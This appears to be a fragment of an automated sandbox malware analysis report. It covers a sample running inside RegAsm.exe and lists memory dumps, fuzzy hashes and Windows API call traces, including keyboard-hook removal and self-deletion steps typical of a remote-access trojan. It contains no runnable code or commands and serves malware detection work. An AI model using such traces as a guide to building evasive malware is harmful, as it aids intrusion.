                                                                                                                                  • Instruction Fuzzy Hash: 0FB13B315106089FD715CF28C48AB657BE0FF053A6F25865DE899CF3A2C339EA96CB44

APIs
• RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,1000B5BC,?,?,00000008,?,?,1000B25C,00000000), ref: 1000B7EE
Memory Dump Source
• Source File: 0000000D.00000002.920353796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000D.00000002.920348667.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000D.00000002.920353796.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
Similarity
• API ID: ExceptionRaise
• String ID:
• API String ID: 3997070919-0
• Opcode ID: 5385f7ee1153a66eb2669645b58237e3e0719d9079e030963b5c19e75e4dc3f3
• Instruction ID: c899a2dc376e060411cab8954cdd4c29929d9ba6cfa71f030d59b99a2ca162da
• Opcode Fuzzy Hash: 5385f7ee1153a66eb2669645b58237e3e0719d9079e030963b5c19e75e4dc3f3
• Instruction Fuzzy Hash: 0DB16B31610A09CFE755CF28C486B647BE0FF453A4F25C658E89ACF2A5C735E982CB40

Strings
Memory Dump Source
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID:
• String ID: 0
• API String ID: 0-4108050209
• Opcode ID: ac460f81c2ed1c183269c9f6522614bdccbebbe18bfaf8fef360a7d89dd83e89
• Instruction ID: b5ae8e6f7fa87a7dee9e60626e0a37a25df5f2dd99b83f8da903d7583ecded6c
• Opcode Fuzzy Hash: ac460f81c2ed1c183269c9f6522614bdccbebbe18bfaf8fef360a7d89dd83e89
• Instruction Fuzzy Hash: 0C129E727083048BD304DF65D882A1EB7E2BFCC758F15892EF495AB381DA74E915CB86

APIs
  • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
  • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004523E7
Memory Dump Source
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: ErrorLast$_free$InfoLocale_abort
• String ID:
• API String ID: 1663032902-0
• Opcode ID: b4047fd74fafd511f87100a415ff7352fa71784cc782813174b617cf7262d9f7
• Instruction ID: 2d4dd0c1c30cd12b50dfb53a4a1f7f5f9091958bb121381f53cce851c87d7921
• Opcode Fuzzy Hash: b4047fd74fafd511f87100a415ff7352fa71784cc782813174b617cf7262d9f7
• Instruction Fuzzy Hash: F921D632600606ABDB249F25DD41FBB73A8EB06316F10407FED01D6152EBBC9D48CB59

APIs
  • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
• GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00452361,00000000,00000000,?), ref: 004525EF
Memory Dump Source
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: ErrorLast$InfoLocale_abort_free
• String ID:
• API String ID: 2692324296-0
• Opcode ID: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
• Instruction ID: 8c29d710edde3bbc403447a64c1727e90569dbd09ff88c71ffccea9529c81983
• Opcode Fuzzy Hash: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
• Instruction Fuzzy Hash: C4F04936A00116BBDB245A24D905BBF7B58EB01315F04446BEC05A3241FAF8FD058694

APIs
  • Part of subcall function 00445909: EnterCriticalSection.KERNEL32(-0006D41D,?,0044305C,00000000,0046E938,0000000C,00443017,?,?,?,00445BA7,?,?,0044834A,00000001,00000364), ref: 00445918
• EnumSystemLocalesW.KERNEL32(0044843E,00000001,0046EAE0,0000000C), ref: 004484BC
Memory Dump Source
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: CriticalEnterEnumLocalesSectionSystem
• String ID:
• API String ID: 1272433827-0
• Opcode ID: 08771b5932cf67d2f7a499a1ea32343f451e1cff339441a182db03018af17ba2
• Instruction ID: 901ea181f65c0ebd25502bb0be635eecd519ab6688482fb1bf3a60b9f01fb263
• Opcode Fuzzy Hash: 08771b5932cf67d2f7a499a1ea32343f451e1cff339441a182db03018af17ba2
• Instruction Fuzzy Hash: 37F04F76A50200EFEB00EF69D946B4D37E0FB04725F10446EF514DB2A2DB7899809B49

APIs
  • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
• EnumSystemLocalesW.KERNEL32(00451F27,00000001,?,?,?,00452792,JD,?,?,?,?,?,00444AED,?,?,?), ref: 00452007
Memory Dump Source
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: ErrorLast$EnumLocalesSystem_abort_free
• String ID:
• API String ID: 1084509184-0
• Opcode ID: 06cdaad2b1dd0330ee545a4703de2c72ad4f4425d90ac6c7aa7d45dfeb8c5d5b
• Instruction ID: 16a122e2f6617649f53ffd93528404cf76eb0d70ff9257d35f530b0535ef024d
• Opcode Fuzzy Hash: 06cdaad2b1dd0330ee545a4703de2c72ad4f4425d90ac6c7aa7d45dfeb8c5d5b
• Instruction Fuzzy Hash: 84F0203630020597CB04AF75D845B6A7F90EB82729B06009AFE058B6A2C7799842C754

APIs
• GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,00415537,00474EE0,00475A00,00474EE0,00000000,00474EE0,00000000,00474EE0,5.1.3 Pro), ref: 0040F920
Memory Dump Source
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: InfoLocale
• String ID:
• API String ID: 2299586839-0
• Opcode ID: 6e7e1272b5dd4961ec291f7251087c477c276ff70ea579fe19356fd9f5958aa4
• Instruction ID: 54543d52817102a935349e0949155b160d3bd36039d058f0142c014f19b14c2e
• Opcode Fuzzy Hash: 6e7e1272b5dd4961ec291f7251087c477c276ff70ea579fe19356fd9f5958aa4
• Instruction Fuzzy Hash: D5D05B3074421C77D61096959D0AEAA779CD701B52F0001A6BB05D72C0D9E15E0087D1

Strings
Memory Dump Source
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID:
• String ID: @
• API String ID: 0-2766056989
• Opcode ID: d5e9d99cca5bd5e192b92381c11644beefd2514f072827777375d50a0dc20ebe
• Instruction ID: bbd91956ea41f9089fdf4ea26de33e0e8d132f349ea16d9e77f48d305cf446da
• Opcode Fuzzy Hash: d5e9d99cca5bd5e192b92381c11644beefd2514f072827777375d50a0dc20ebe
• Instruction Fuzzy Hash: F1412975A183558FC340CF29D58020AFBE1FFC8318F645A1EF889A3350D379E9428B86

Memory Dump Source
• Source File: 0000000D.00000002.920353796.0000000010016000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000D.00000002.920348667.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000D.00000002.920353796.0000000010001000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: f12bac2ceacaba3709f449de7301e54826307763cc64d35c491f096f7cc92462
• Instruction ID: 44f99013a838546abf86f75096a930c39f9ce457c7277da91ad5f6740c4fb7fb
• Opcode Fuzzy Hash: f12bac2ceacaba3709f449de7301e54826307763cc64d35c491f096f7cc92462
• Instruction Fuzzy Hash: 89628C316083958FD324DF28C48469ABBF1FF85384F154A2DE9E98B391E771D989CB42
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: c092c4f6b84b18e3b6cbbf7fe4413e1147b07dd6558fe569cc2693f6d3c9d2d8
                                                                                                                                  • Instruction ID: 4200599dcb49c21c1ca78238ad82984ca11e49a574bdd01b256a4bdf4e559873
                                                                                                                                  • Opcode Fuzzy Hash: c092c4f6b84b18e3b6cbbf7fe4413e1147b07dd6558fe569cc2693f6d3c9d2d8
                                                                                                                                  • Instruction Fuzzy Hash: D2322521D69F414DE7239A35CC22336A24CBFB73C5F15D737E81AB5AAAEB29C4834105
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 11fe0a22ef666ee2c1bed35089f8503541a39c5702d52e9a7652229b453a748b
                                                                                                                                  • Instruction ID: 06c66d0f35fb266b7f69fbfce4f1f639eb17408d85dd7e5468211ecdc8378744
                                                                                                                                  • Opcode Fuzzy Hash: 11fe0a22ef666ee2c1bed35089f8503541a39c5702d52e9a7652229b453a748b
                                                                                                                                  • Instruction Fuzzy Hash: 7932C2716087459BC715DF28C4807ABB7E5BF84318F040A3EF89587392D779D98ACB8A
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 069969c8f4566116342464d842351c7afe0a72e1e3c3dbe851ab1ff53bf1dd64
                                                                                                                                  • Instruction ID: b033fe34555866f616fd3cc64b543b740d9cc82fbf2d17309ab2a27531c6336b
                                                                                                                                  • Opcode Fuzzy Hash: 069969c8f4566116342464d842351c7afe0a72e1e3c3dbe851ab1ff53bf1dd64
                                                                                                                                  • Instruction Fuzzy Hash: 6C02CEB17046528BC358CF2EEC5053AB7E1AB8D311744863EE495C7781EB35FA22CB94
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 82c6eebf497a8783bea5e127f8a47c76021f3e74a05456d4a9fdc662aa60ff2a
                                                                                                                                  • Instruction ID: 06b531cc06dcd57701b547059d2c567c45bbe225ee7d26ac7aed84b394be02a5
                                                                                                                                  • Opcode Fuzzy Hash: 82c6eebf497a8783bea5e127f8a47c76021f3e74a05456d4a9fdc662aa60ff2a
                                                                                                                                  • Instruction Fuzzy Hash: 2DF19D716142558FC348CF1DE8A187BB3E1FB89311B450A2EF582C3391DB79EA16CB56
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                                                                                  • Instruction ID: 2ce137016e68017aebaac4bbf916a57dff7c64f07ba89619fc9d118b501662d8
                                                                                                                                  • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                                                                                  • Instruction Fuzzy Hash: F9C1D5B22091930AEF3D4639853063FFAA05E957B171A635FE4F2CB2D4FE18C924D514
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                                                                                  • Instruction ID: bc2d6065b6eca92eb436045fb502f22698d18e4b36ed1375ff5d5b4a3f5914d0
                                                                                                                                  • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                                                                                  • Instruction Fuzzy Hash: 75C1D7722091930AEF2D4739853463FFAA15EA57B171A236FE4F2CB2D4FE28C924D514
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                                                                                  • Instruction ID: 708e8454946620f186a1700387687a053fc407bd339bf74556c1f47a113f5a1a
                                                                                                                                  • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                                                                                  • Instruction Fuzzy Hash: 95C1C3B220D0930AEF3D4639853063FFAA15EA67B171A675ED4F2CB2D4FE18C924D614
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                                                                  • Instruction ID: 79ee4f31eba35b7567f7a499d226924a3a6c1d38d98321864059dc3c63d33f3d
                                                                                                                                  • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                                                                  • Instruction Fuzzy Hash: 76C1E6B220D0930AEF3D4639853463FBAA15EA57B171A236FD4F2CB2D4FE18C924C614
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 2e85d6dc501202f3c2e801dccf0940871ddf0a86c450432c97aa3465398b7722
                                                                                                                                  • Instruction ID: 096ff1c695f9ab27d4b2dbab46670c8098de74970727e2ec16deab2a6828ec1d
                                                                                                                                  • Opcode Fuzzy Hash: 2e85d6dc501202f3c2e801dccf0940871ddf0a86c450432c97aa3465398b7722
                                                                                                                                  • Instruction Fuzzy Hash: EAB1A37951429A8ACB05EF68C4913F63BA1EF6A301F0850B9EC9CCF757D2398506EB24
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 30caec0efc745099040319085d406cd9bdcff08e218f1b0552064e12ef4373be
                                                                                                                                  • Instruction ID: 32d6082e35155a0a096806a6943d6f48c3d67459c64856e3d931f7c23e0710f9
                                                                                                                                  • Opcode Fuzzy Hash: 30caec0efc745099040319085d406cd9bdcff08e218f1b0552064e12ef4373be
• Instruction Fuzzy Hash: 59618971202709A6EE34892B88967BF63949F6D314F10342FE983DB3C1D65DDD82931E
Memory Dump Source
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 341ce5e44018b0d8febb5363e57dd776d1ec6df4a054cddc6676df713c6a7dda
• Instruction ID: 5d22fc1bcc5d638cf6a4a0606be4d5c4d5bba199c703cf788a7f99cafe8d65e8
• Opcode Fuzzy Hash: 341ce5e44018b0d8febb5363e57dd776d1ec6df4a054cddc6676df713c6a7dda
• Instruction Fuzzy Hash: 12615871602718A6DA38592B88977BF2384EB2D344F94351BE483DB3C1D75EAD43871E
Memory Dump Source
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 0cdc0b4430c882dd513f9aba2f942575131dd1f5e6007437ccc46010af73f7df
• Instruction ID: 6c705508b021f12d90b9f9697341ee8142861c1d23b7247138392dbd6e0aa073
• Opcode Fuzzy Hash: 0cdc0b4430c882dd513f9aba2f942575131dd1f5e6007437ccc46010af73f7df
• Instruction Fuzzy Hash: 59517671603604A7EF3445AB85567BF63899B0E304F18395FE882C73C2C52DDE02875E
Memory Dump Source
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e4e8e107ebb569481f6dec165aac6f3bea1aaf1a879556bc36ff33913e703c4a
• Instruction ID: 84bf5d8b6cf777f915eff3509e2c27b9c7ae744ab127a35c194aadb47efed811
• Opcode Fuzzy Hash: e4e8e107ebb569481f6dec165aac6f3bea1aaf1a879556bc36ff33913e703c4a
• Instruction Fuzzy Hash: E1517761E0660557DF38892A94D67BF23A59B4E308F18351FE483CB3C2C65EEE06835E
Memory Dump Source
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5391bdb46e7b363b15ab8dfbfe7515acbec1a5683836347dd09947684361f79a
• Instruction ID: d4d389248adab082d17fbdeb677dfbf93ddf16fcbb8c162b69e64d6cf0e33668
• Opcode Fuzzy Hash: 5391bdb46e7b363b15ab8dfbfe7515acbec1a5683836347dd09947684361f79a
• Instruction Fuzzy Hash: 61615B72A083059BC308DF35E481A5FB7E4AFCC718F814E2EF595D6151EA74EA08CB86
Memory Dump Source
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
• Instruction ID: 582e3a7babb983407823034c482dc4f24404013c153b7f4d28c3fef3b0c68a44
• Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
• Instruction Fuzzy Hash: 43113B7720034183D60CAA6DC4B45BBD795EADE320FBD627FF0414B744CA2AD4459508
APIs
  • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
  • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
• GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040D558
• RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D56B
• SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040D584
• SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040D5B4
  • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2B8,00000000,004752F0,pth_unenc,0040D0F3,004752D8,004752F0,?,pth_unenc), ref: 0040B8F6
  • Part of subcall function 0040B8E7: UnhookWindowsHookEx.USER32 ref: 0040B902
  • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2A2,00000000,?,pth_unenc), ref: 0040B910
  • Part of subcall function 0041C482: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C4C1
• ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D7FF
• ExitProcess.KERNEL32 ref: 0040D80B
Strings
Memory Dump Source
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
